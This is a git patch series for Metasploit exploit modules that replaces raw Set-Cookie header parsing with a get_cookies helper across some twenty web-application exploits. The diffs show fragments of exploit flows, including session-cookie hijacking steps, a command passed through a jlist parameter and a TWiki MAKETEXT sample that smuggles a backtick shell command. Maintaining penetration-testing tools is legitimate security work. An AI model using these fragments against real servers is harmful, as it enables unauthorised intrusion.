From 8d4d40b8ba5b0c5d5377895369a0173754a9dda3 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sat, 24 May 2014 00:34:46 +0200 Subject: [PATCH 1/2] Resolved some Set-Cookie warnings --- modules/exploits/multi/http/wikka_spam_exec.rb | 11 ++++++----- modules/exploits/multi/http/zabbix_script_exec.rb | 2 +- .../exploits/multi/php/php_unserialize_zval_cookie.rb | 2 +- modules/exploits/unix/http/lifesize_room.rb | 4 ++-- modules/exploits/unix/webapp/foswiki_maketext.rb | 6 +++--- modules/exploits/unix/webapp/hastymail_exec.rb | 2 +- .../unix/webapp/invision_pboard_unserialize_exec.rb | 2 +- .../exploits/unix/webapp/joomla_media_upload_exec.rb | 4 ++-- modules/exploits/unix/webapp/nagios_graph_explorer.rb | 2 +- .../unix/webapp/openemr_sqli_privesc_upload.rb | 2 +- modules/exploits/unix/webapp/phpmyadmin_config.rb | 2 +- modules/exploits/unix/webapp/sphpblog_file_upload.rb | 4 ++-- .../exploits/unix/webapp/sugarcrm_unserialize_exec.rb | 4 ++-- modules/exploits/unix/webapp/trixbox_langchoice.rb | 4 ++-- modules/exploits/unix/webapp/twiki_maketext.rb | 6 +++--- .../exploits/unix/webapp/vbulletin_vote_sqli_exec.rb | 2 +- modules/exploits/unix/webapp/webmin_show_cgi_exec.rb | 8 ++++---- .../unix/webapp/wp_google_document_embedder_exec.rb | 6 +----- modules/exploits/unix/webapp/zpanel_username_exec.rb | 4 ++-- modules/exploits/windows/http/osb_uname_jlist.rb | 4 ++-- .../windows/http/solarwinds_storage_manager_sql.rb | 4 ++-- 21 files changed, 41 insertions(+), 44 deletions(-) diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 20d4a365d3..160a553278 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb @@ -90,8 +90,8 @@ class Metasploit3 < Msf::Exploit::Remote # Get the cookie in this format: # 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka - if res and res.headers['Set-Cookie'] - cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0] + if res and res.get_cookies + cookie = res.get_cookies else fail_with(Failure::Unknown, "#{peer} - No cookie found, will not continue") end @@ -141,9 +141,10 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_post' => login }) - if res and res.headers['Set-Cookie'] =~ /user_name/ - user = res.headers['Set-Cookie'].scan(/(user_name\@\w+=\w+);/)[0] || "" - pass = res.headers['Set-Cookie'].scan(/(pass\@\w+=\w+)/)[0] || "" + if res and res.get_cookies =~ /user_name/ + c = res.get_cookies + user = c.scan(/(user_name\@\w+=\w+);/)[0] || "" + pass = c.scan(/(pass\@\w+=\w+)/)[0] || "" cookie_cred = "#{cookie}; #{user}; #{pass}" else cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}" diff --git a/modules/exploits/multi/http/zabbix_script_exec.rb b/modules/exploits/multi/http/zabbix_script_exec.rb index 57ec58c718..47409ba37f 100644 --- a/modules/exploits/multi/http/zabbix_script_exec.rb +++ b/modules/exploits/multi/http/zabbix_script_exec.rb @@ -88,7 +88,7 @@ class Metasploit4 < Msf::Exploit::Remote fail_with("Login failed") end - sess = login.headers['Set-Cookie'] + sess = login.get_cookies dash = send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb index b18a55f292..3153f03bae 100644 --- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb +++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb @@ -255,7 +255,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Detect the phpBB cookie name - if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ /(.*)_(sid|data)=/) + if res.get_cookies =~ /(.*)_(sid|data)=/ vprint_status("The server may require a cookie name of '#{$1}_data'") end diff --git a/modules/exploits/unix/http/lifesize_room.rb b/modules/exploits/unix/http/lifesize_room.rb index e8fef8bcbc..96d9b28600 100644 --- a/modules/exploits/unix/http/lifesize_room.rb +++ b/modules/exploits/unix/http/lifesize_room.rb @@ -56,11 +56,11 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', }, 10) - if not (res and res.headers['set-cookie']) + if res.nil? || res.get_cookies.empty? fail_with(Failure::NotFound, 'Could not obtain a Session ID') end - sessionid = 'PHPSESSID=' << res.headers['set-cookie'].split('PHPSESSID=')[1].split('; ')[0] + sessionid = 'PHPSESSID=' << res.get_cookies.split('PHPSESSID=')[1].split('; ')[0] headers = { 'Cookie' => sessionid, diff --git a/modules/exploits/unix/webapp/foswiki_maketext.rb b/modules/exploits/unix/webapp/foswiki_maketext.rb index a5b410086f..4701e7cb72 100644 --- a/modules/exploits/unix/webapp/foswiki_maketext.rb +++ b/modules/exploits/unix/webapp/foswiki_maketext.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /FOSWIKISID=([0-9a-f]*)/ + if not res or res.code != 302 or res.get_cookies !~ /FOSWIKISID=([0-9a-f]*)/ vprint_status "#{res.code}\n#{res.body}" return nil end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_good("validation_key found: #{validation_key}") if session.empty? - if res.headers['Set-Cookie'] =~ /FOSWIKISID=([0-9a-f]*)/ + if res.get_cookies =~ /FOSWIKISID=([0-9a-f]*)/ session = $1 else vprint_error("Error using anonymous access") @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - if res.headers['Set-Cookie'] =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/ + if res.get_cookies =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/ strike_one = $1 else vprint_error("Error getting the FOSWIKISTRIKEONE value") diff --git a/modules/exploits/unix/webapp/hastymail_exec.rb b/modules/exploits/unix/webapp/hastymail_exec.rb index ae6cfbfe69..9fb9ac8969 100644 --- a/modules/exploits/unix/webapp/hastymail_exec.rb +++ b/modules/exploits/unix/webapp/hastymail_exec.rb @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 303 - @session_id = res["Set-Cookie"] + @session_id = res.get_cookies print_good "#{peer} - Authentication successful" end end diff --git a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb index d3d21d0547..930db07be9 100644 --- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET' }) - if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/ + if res and res.code == 200 and res.get_cookies =~ /(.+)session/ print_status("#{peer} - Cookie prefix #{$1} found") cookie_prefix = $1 end diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb index 9645358c82..fa6e2b56d8 100644 --- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb +++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb @@ -177,7 +177,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Checking Access to Media Component...") res = get_upload_form - if res and (res.code == 200 or res.code == 302) and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource/ + if res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /You are not authorised to view this resource/ print_status("#{peer} - Authentication required... Proceeding...") if @username.empty? or @password.empty? @@ -196,7 +196,7 @@ class Metasploit3 < Msf::Exploit::Remote if not res or res.code != 303 fail_with(Failure::NoAccess, "#{peer} - Unable to Authenticate") end - elsif res and (res.code == 200 or res.code == 302) and res.headers['Set-Cookie'] and res.body =~ /
/).flatten[0] || '' - cookie = (res.headers['Set-Cookie'] || '').scan(/nagiosxi=(\w+); /).flatten[0] || '' + cookie = res.get_cookies.scan(/nagiosxi=(\w+); /).flatten[0] || '' return nsp, cookie end diff --git a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb index a795414f59..d563f00ad0 100644 --- a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb +++ b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res && res.code == 200 and res.headers['Set-Cookie'] =~ /OpenEMR=([a-zA-Z0-9]+)/ + if res && res.code == 200 and res.get_cookies =~ /OpenEMR=([a-zA-Z0-9]+)/ session = $1 print_status("#{rhost}:#{rport} - Login successful") print_status("#{rhost}:#{rport} - Session cookie is [ #{session} ]") diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb index 2ee3f4a4b5..591fcc8ba0 100644 --- a/modules/exploits/unix/webapp/phpmyadmin_config.rb +++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote return end token = $1 - cookie = response["Set-Cookie"] + cookie = response.get_cookies # There is probably a great deal of randomization that can be done with # this format. diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index 1a91c5763e..ad723c98d9 100644 --- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -112,10 +112,10 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => "user=#{user}&pass=#{pass}", }, 25) - if (res) + if res print_status("Successfully logged in as #{user}:#{pass}") - if (res.headers['Set-Cookie'] =~ /my_id=(.*)/) + if res.get_cookies =~ /my_id=(.*)/ session = $1 print_status("Successfully retrieved cookie: #{session}") return session diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb index e9116a64bd..cacbeb0e67 100644 --- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb @@ -95,12 +95,12 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }) - if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie'] + if res.nil? or res.headers['Location'] =~ /action=Login/ or res.get_cookies.empty? print_error("#{peer} - Login failed with \"#{username}:#{password}\"") return end - if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/ + if res.get_cookies =~ /PHPSESSID=([A-Za-z0-9]*); path/ session_id = $1 else print_error("#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)") diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb index 133b26b8a0..096f669368 100644 --- a/modules/exploits/unix/webapp/trixbox_langchoice.rb +++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status "We received the expected HTTP code #{target_code}" # We will need the cookie PHPSESSID to continue - cookies = response.headers['Set-Cookie'] + cookies = response.get_cookies # Make sure cookies were set if defined? cookies and cookies =~ PHPSESSID_REGEX @@ -145,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status "The server responded to POST with HTTP code #{delivery_response.code}" # We will need the cookie PHPSESSID to continue - cookies = delivery_response.headers['Set-Cookie'] + cookies = delivery_response.get_cookies # Make sure cookies were set if cookies.nil? diff --git a/modules/exploits/unix/webapp/twiki_maketext.rb b/modules/exploits/unix/webapp/twiki_maketext.rb index 5a931d0f21..47bcba11be 100644 --- a/modules/exploits/unix/webapp/twiki_maketext.rb +++ b/modules/exploits/unix/webapp/twiki_maketext.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/ + if not res or res.code != 302 or res.get_cookies !~ /TWIKISID=([0-9a-f]*)/ return nil end @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_good("crypttoken found: #{crypttoken}") if session.empty? - if res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/ + if res.get_cookies =~ /TWIKISID=([0-9a-f]*)/ session = $1 else vprint_error("Error using anonymous access") @@ -225,4 +225,4 @@ end %MAKETEXT{"test [_1] secondtest\\'}; `touch /tmp/msf.txt`; { #" args="msf"}% -=end \ No newline at end of file +=end diff --git a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb index 4d27bc797b..9194c0958b 100644 --- a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb +++ b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb @@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and res.headers['Set-Cookie'] + if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and !res.get_cookies.empty? session = res.get_cookies else return nil diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb index 9de059083a..b118f8867f 100644 --- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb +++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb @@ -75,9 +75,9 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) - if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/ + if res and res.code == 302 and res.get_cookies =~ /sid/ vprint_good "#{peer} - Authentication successful" - session = res.headers['Set-Cookie'].split("sid=")[1].split(";")[0] + session = res.get_cookies.split("sid=")[1].split(";")[0] else vprint_error "#{peer} - Service found, but authentication failed" return Exploit::CheckCode::Detected @@ -118,8 +118,8 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) - if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/ - session = res.headers['Set-Cookie'].scan(/sid\=(\w+)\;*/).flatten[0] || '' + if res and res.code == 302 and res.get_cookies =~ /sid/ + session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || '' if session and not session.empty? print_good "#{peer} - Authentication successfully" else diff --git a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb index d52ecda3a8..917730eeac 100644 --- a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb +++ b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb @@ -215,11 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "Unexpected reply - #{res.code}") end - admin_cookie = '' - (res.headers['Set-Cookie'] || '').split(',').each do |cookie| - admin_cookie << cookie.split(';')[0] - admin_cookie << ';' - end + admin_cookie = res.get_cookies if admin_cookie.empty? fail_with(Failure::UnexpectedReply, 'The resulting cookie was empty') diff --git a/modules/exploits/unix/webapp/zpanel_username_exec.rb b/modules/exploits/unix/webapp/zpanel_username_exec.rb index e4508a5448..6191617631 100644 --- a/modules/exploits/unix/webapp/zpanel_username_exec.rb +++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Login failed") end - res.headers['Set-Cookie'].to_s.scan(/(zUserSaltCookie=[a-z0-9]+)/).flatten[0] || '' + res.get_cookies.scan(/(zUserSaltCookie=[a-z0-9]+)/).flatten[0] || '' end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Connection timed out while collecting CSFR token") if not res token = res.body.scan(//).flatten[0] || '' - sid = res.headers['Set-Cookie'].to_s.scan(/(PHPSESSID=[a-z0-9]+)/).flatten[0] || '' + sid = res.get_cookies.scan(/(PHPSESSID=[a-z0-9]+)/).flatten[0] || '' fail_with(Failure::Unknown, "#{peer} - No CSFR token collected") if token.empty? return token, sid diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb index 1590d1ba62..4b4422ebd1 100644 --- a/modules/exploits/windows/http/osb_uname_jlist.rb +++ b/modules/exploits/windows/http/osb_uname_jlist.rb @@ -74,8 +74,8 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'POST', }, 5) - if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i)) - sessionid = res.headers['Set-Cookie'].split(';')[0] + if res.get_cookies.match(/PHPSESSID=(.*);(.*)/i) + sessionid = res.get_cookies data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd) diff --git a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb index d583cd0285..53660c9e7e 100644 --- a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb +++ b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb @@ -187,8 +187,8 @@ class Metasploit3 < Msf::Exploit::Remote # Pick up the cookie, example: # JSESSIONID=D90AC5C0BB43B5AC1396736214A1B5EB - if res and res.headers['Set-Cookie'] =~ /JSESSIONID=(\w+);/ - cookie = "JSESSIONID=#{$1}" + if res and res.get_cookies =~ /JSESSIONID=(\w+);/ + cookie = res.get_cookies else print_error("Unable to get a session ID") return From df97c66ff5b8013026b557071529061bbde46349 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sat, 24 May 2014 00:37:52 +0200 Subject: [PATCH 2/2] Fixed check --- modules/exploits/multi/http/wikka_spam_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 160a553278..e6068cdaba 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote # Get the cookie in this format: # 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka - if res and res.get_cookies + if res and !res.get_cookies.empty? cookie = res.get_cookies else fail_with(Failure::Unknown, "#{peer} - No cookie found, will not continue")